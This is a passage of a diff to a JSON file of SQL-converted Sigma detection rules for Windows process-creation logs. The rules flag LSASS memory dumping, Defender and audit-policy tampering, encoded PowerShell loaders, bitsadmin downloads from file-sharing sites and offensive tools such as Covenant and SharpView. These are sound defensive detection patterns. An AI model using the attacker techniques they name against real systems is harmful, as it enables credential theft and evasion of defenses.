'%B7ADIAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hwp_exploits.yml" + "filename": "proc_creation_win_powershell_encoded_obfusc.yml" }, { - "title": "Scheduled Task Executing Powershell Encoded Payload from Registry", - "id": "c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78", - "status": "test", - "description": "Detects the creation of a schtask that executes a base64 encoded payload stored in the Windows Registry using PowerShell.", - "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", + "title": "Wab Execution From Non Default Location", + "id": "395907ee-96e5-4666-af2e-2ca91688e151", + "status": "experimental", + "description": "Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%FromBase64String%' ESCAPE '\\' AND CommandLine LIKE '%Get-ItemProperty%' ESCAPE '\\' AND (CommandLine LIKE '%HKCU:%' ESCAPE '\\' OR CommandLine LIKE '%HKLM:%' ESCAPE '\\' OR CommandLine LIKE '%registry::%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_%' ESCAPE '\\')))" + "attack.defense_evasion", + "attack.execution" ], - "filename": "proc_creation_win_schtasks_reg_loader.yml" - }, - { - "title": "HackTool - PCHunter Execution", - "id": "fca949cc-79ca-446e-8064-01aa7e52ece5", - "status": "experimental", - "description": "Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\PCHunter64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PCHunter32.exe' ESCAPE '\\') OR OriginalFileName = 'PCHunter.exe' OR Description = 'Epoolsoft Windows Information View Tools' OR (Hashes LIKE '%SHA1=5F1CBC3D99558307BC1250D084FA968521482025%' ESCAPE '\\' OR Hashes LIKE '%MD5=987B65CD9B9F4E9A1AFD8F8B48CF64A7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2B214BDDAAB130C274DE6204AF6DBA5AEEC7433DA99AA950022FA306421A6D32%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=444D210CEA1FF8112F256A4997EED7FF%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3FB89787CB97D902780DA080545584D97FB1C2EB%' ESCAPE '\\' OR Hashes LIKE '%MD5=228DD0C2E6287547E26FFBD973A40F14%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55F041BF4E78E9BFA6D4EE68BE40E496CE3A1353E1CA4306598589E19802522C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0479F44DF47CFA2EF1CCC4416A538663%' ESCAPE '\\') OR md5 IN ('228dd0c2e6287547e26ffbd973a40f14', '987b65cd9b9f4e9a1afd8f8b48cf64a7') OR sha1 IN ('5f1cbc3d99558307bc1250d084fa968521482025', '3fb89787cb97d902780da080545584d97fb1c2eb') OR sha256 IN ('2b214bddaab130c274de6204af6dba5aeec7433da99aa950022fa306421a6d32', '55f041bf4e78e9bfa6d4ee68be40e496ce3a1353e1ca4306598589e19802522c') OR Imphash IN ('444d210cea1ff8112f256a4997eed7ff', '0479f44df47cfa2ef1ccc4416a538663')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wab.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wabmig.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Mail\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Windows Mail\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_pchunter.yml" + "filename": "proc_creation_win_wab_execution_from_non_default_location.yml" }, { - "title": "Taskkill Symantec Endpoint Protection", - "id": "4a6713f6-3331-11ed-a261-0242ac120002", + "title": "Suspicious Windows Defender Registry Key Tampering Via Reg.EXE", + "id": "452bce90-6fb0-43cc-97a5-affc283139b3", "status": "experimental", - "description": "Detects one of the possible scenarios for disabling Symantec Endpoint Protection.\nSymantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.\nAs a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.\n", - "author": "Ilya Krestinichev, Florian Roth (Nextron Systems)", + "description": "Detects the usage of \"reg.exe\" to tamper with different Windows defender registry keys in order to disable some important features related to protection and detection", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Rare legitimate use by administrators to test software (should always be investigated)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%taskkill%' ESCAPE '\\' AND CommandLine LIKE '% /F %' ESCAPE '\\' AND CommandLine LIKE '% /IM %' ESCAPE '\\' AND CommandLine LIKE '%ccSvcHst.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\')) AND ((CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND (CommandLine LIKE '%Real-Time Protection%' ESCAPE '\\' OR CommandLine LIKE '%TamperProtection%' ESCAPE '\\')) OR (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Notification\\_Suppress%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_taskkill_sep.yml" + "filename": "proc_creation_win_reg_defender_tampering.yml" }, { - "title": "Suspicious Download From File-Sharing Website Via Bitsadmin", - "id": "8518ed3d-f7c9-4601-a26c-f361a4256a0c", - "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file from a suspicious domain", - "author": "Florian Roth (Nextron Systems)", + "title": "Time Travel Debugging Utility Usage", + "id": "0b4ae027-2a2d-4b93-8c7e-962caaba5b2a", + "status": "test", + "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.credential_access", + "attack.t1218", + "attack.t1003.001" ], "falsepositives": [ - "Some legitimate apps use this, but limited." + "Legitimate usage by software developers/testers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\tttracer.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_bitsadmin_download_file_sharing_domains.yml" + "filename": "proc_creation_win_lolbin_tttracer_mod_load.yml" }, { - "title": "Abused Debug Privilege by Arbitrary Parent Processes", - "id": "d522eca2-2973-4391-a3e0-ef0374321dae", + "title": "Audit Policy Tampering Via NT Resource Kit Auditpol", + "id": "c6c56ada-612b-42d1-9a29-adad3c5c2c1e", "status": "test", - "description": "Detection of unusual child processes by different system processes", - "author": "Semanur Guneysu @semanurtg, oscd.community", + "description": "Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1548" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Unknown" + "The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. The FP rate should be very low except for tools that use a similar flag structure" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\searchindexer.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe'))) AND NOT (CommandLine LIKE '% route %' ESCAPE '\\' AND CommandLine LIKE '% ADD %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%/logon:none%' ESCAPE '\\' OR CommandLine LIKE '%/system:none%' ESCAPE '\\' OR CommandLine LIKE '%/sam:none%' ESCAPE '\\' OR CommandLine LIKE '%/privilege:none%' ESCAPE '\\' OR CommandLine LIKE '%/object:none%' ESCAPE '\\' OR CommandLine LIKE '%/process:none%' ESCAPE '\\' OR CommandLine LIKE '%/policy:none%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_abusing_debug_privilege.yml" + "filename": "proc_creation_win_auditpol_nt_resource_kit_usage.yml" }, { - "title": "HackTool - HandleKatz LSASS Dumper Execution", - "id": "ca621ba5-54ab-4035-9942-d378e6fcde3c", + "title": "Manage Engine Java Suspicious Sub Process", + "id": "cea2b7ea-792b-405f-95a1-b903ea06458f", "status": "experimental", - "description": "Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same", + "description": "Detects suspicious sub processes started by the Manage Engine ServiceDesk Plus Java web service process", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], "falsepositives": [ - "Unknown" + "Legitimate sub processes started by Manage Engine ServiceDesk Pro" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\loader.exe' ESCAPE '\\' AND CommandLine LIKE '%--pid:%' ESCAPE '\\') OR (Imphash IN ('38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650') OR Hashes IN ('IMPHASH=38D9E015591BBFD4929E0D0F47FA0055', 'IMPHASH=0E2216679CA6E1094D63322E3412D650')) OR (CommandLine LIKE '%--pid:%' ESCAPE '\\' AND CommandLine LIKE '%--outfile:%' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%.obf%' ESCAPE '\\' OR CommandLine LIKE '%dump%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\ManageEngine\\\\ServiceDesk\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\java.exe%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\')) AND NOT (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_handlekatz.yml" + "filename": "proc_creation_win_susp_manageengine_pattern.yml" }, { - "title": "Privilege Escalation via Named Pipe Impersonation", - "id": "9bd04a79-dabe-4f1f-a5ff-92430265c96b", + "title": "Suspicious Usage Of ShellExec_RunDLL", + "id": "d87bd452-6da1-456e-8155-7dc988157b7d", "status": "experimental", - "description": "Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.", - "author": "Tim Rauch", + "description": "Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021" + "attack.defense_evasion" ], "falsepositives": [ - "Other programs that cause these patterns (please report)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE')) AND (CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%ShellExec\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%odbcconf%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%iex%' ESCAPE '\\' OR CommandLine LIKE '%comspec%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_priv_escalation_via_named_pipe.yml" + "filename": "proc_creation_win_rundll32_susp_shellexec_execution.yml" }, { - "title": "Potential Arbitrary Command Execution Using Msdt.EXE", - "id": "258fc8ce-8352-443a-9120-8a11e4857fa5", - "status": "experimental", - "description": "Detects processes leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Renamed ProcDump Execution", + "id": "4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67", + "status": "test", + "description": "Detects the execution of a renamed ProcDump executable often used by attackers or malware", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Procdump illegaly bundled with legitimate software", + "Administrators who rename binaries (should be investigated)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe') AND (CommandLine LIKE '%IT\\_BrowseForFile=%' ESCAPE '\\' OR (CommandLine LIKE '% PCWDiagnostic%' ESCAPE '\\' AND (CommandLine LIKE '% /af %' ESCAPE '\\' OR CommandLine LIKE '% -af %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'procdump' OR ((CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND (CommandLine LIKE '% -accepteula %' ESCAPE '\\' OR CommandLine LIKE '% /accepteula %' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_msdt_arbitrary_command_execution.yml" + "filename": "proc_creation_win_renamed_sysinternals_procdump.yml" }, { - "title": "HackTool - Covenant PowerShell Launcher", - "id": "c260b6db-48ba-4b4a-a76f-2f67644e99d2", - "status": "test", - "description": "Detects suspicious command lines used in Covenant luanchers", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "title": "HackTool - SharpView Execution", + "id": "b2317cfa-4a47-4ead-b3ff-297438c0bc2d", + "status": "experimental", + "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", + "author": "frack113", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1059.001", - "attack.t1564.003" + "attack.discovery", + "attack.t1049", + "attack.t1069.002", + "attack.t1482", + "attack.t1135", + "attack.t1033" + ], + "falsepositives": [ + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%-Sta%' ESCAPE '\\' AND CommandLine LIKE '%-Nop%' ESCAPE '\\' AND CommandLine LIKE '%-Window%' ESCAPE '\\' AND CommandLine LIKE '%Hidden%' ESCAPE '\\' AND (CommandLine LIKE '%-Command%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\')) OR (CommandLine LIKE '%sv o (New-Object IO.MemorySteam);sv d %' ESCAPE '\\' OR CommandLine LIKE '%mshta file.hta%' ESCAPE '\\' OR CommandLine LIKE '%GruntHTTP%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand cwB2ACAAbwAgA%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'SharpView.exe' OR NewProcessName LIKE '%\\\\SharpView.exe' ESCAPE '\\' OR (CommandLine LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Convert-ADName%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-SID%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR CommandLine LIKE '%Convert-SidToName%' ESCAPE '\\' OR CommandLine LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainProcess%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainShare%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignUser%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-Interesting%' ESCAPE '\\' OR CommandLine LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR CommandLine LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-DFSshare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainController%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDFSShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDNSRecord%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainForeign%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGUIDMap%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainManagedSecurityGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainPolicy%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSID%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestGlobalCatalog%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-GptTmpl%' ESCAPE '\\' OR CommandLine LIKE '%Get-GroupsXML%' ESCAPE '\\' OR CommandLine LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetForest%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGroupMember%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetProcess%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetUser%' ESCAPE '\\' OR CommandLine LIKE '%Get-PathAcl%' ESCAPE '\\' OR CommandLine LIKE '%Get-PrincipalContext%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegCachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegLastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegProxy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharefinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR CommandLine LIKE '%Remove-DomainObjectAcl%' ESCAPE '\\' OR CommandLine LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Request-SPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Set-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Test-AdminAccess%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_covenant.yml" + "filename": "proc_creation_win_hktl_sharpview.yml" }, { - "title": "System File Execution Location Anomaly", - "id": "e4a6b256-3e47-40fc-89d2-7a477edd6915", - "status": "experimental", - "description": "Detects a Windows program executable started from a suspicious folder", - "author": "Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali", + "title": "Process Dumping Via Comsvcs.DLL", + "id": "646ea171-dded-4578-8a4d-65e9822892e3", + "status": "test", + "description": "Detects a process memory dump via \"comsvcs.dll\" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)", + "author": "Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036" + "attack.credential_access", + "attack.t1036", + "attack.t1003.001", + "car.2013-05-009" ], "falsepositives": [ - "Exotic software" + "Unlikely, because no one should dump the process memory in that way" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' 